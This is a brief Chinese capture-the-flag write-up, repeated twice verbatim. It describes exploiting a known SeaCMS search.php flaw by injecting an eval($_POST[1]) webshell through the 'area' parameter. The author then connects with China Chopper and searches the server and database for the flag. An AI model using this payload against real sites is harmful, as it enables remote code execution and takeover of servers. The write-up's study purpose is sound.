一看题目发现善于查资料就行了,那估计就是以前的漏洞,需要百度搜一下,果然是海洋cms的漏洞!这个漏洞是前台getshell漏洞,seach漏洞,该漏洞成因在于search.php没有对用户输入内容进行过滤,在地址栏上加上/search.php?searchtype=5&tid=&area=eval($_POST[1]),用菜刀连接,密码为1
在后台文件中存放主要信息的是www文件夹。并没发现有flag字样,所以开始找数据库信息
上边为数据库信息,然后数据库管理
得到flag
一看题目发现善于查资料就行了,那估计就是以前的漏洞,需要百度搜一下,果然是海洋cms的漏洞!这个漏洞是前台getshell漏洞,seach漏洞,该漏洞成因在于search.php没有对用户输入内容进行过滤,在地址栏上加上/search.php?searchtype=5&tid=&area=eval($_POST[1]),用菜刀连接,密码为1
在后台文件中存放主要信息的是www文件夹。并没发现有flag字样,所以开始找数据库信息
上边为数据库信息,然后数据库管理
得到flag